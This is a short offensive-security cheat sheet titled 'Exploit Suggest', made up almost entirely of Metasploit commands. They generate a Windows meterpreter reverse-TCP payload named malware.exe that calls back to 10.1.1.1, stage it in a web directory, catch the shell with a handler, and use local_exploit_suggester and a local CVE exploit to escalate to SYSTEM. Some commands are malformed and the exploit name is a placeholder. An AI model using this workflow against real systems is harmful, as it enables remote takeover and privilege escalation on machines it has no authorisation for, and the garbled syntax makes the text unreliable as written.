Exploit Suggest
#Reverse shell with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.1.1.1 lport 4343 -f exe malware.exe mv /var/www/html/malware.exe
#Start reverse shell
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.1.1.1
set lport 4343
#creates a meterpreter session with reverse shell and limited rights
#kali to elevate user privs to system - looks for potential cve's
use post/multi/recon/local_exploit_suggester
set session 1
run
#suggested cve
use exploit/windows/local/cve2020_something
set session 1
run
Last updated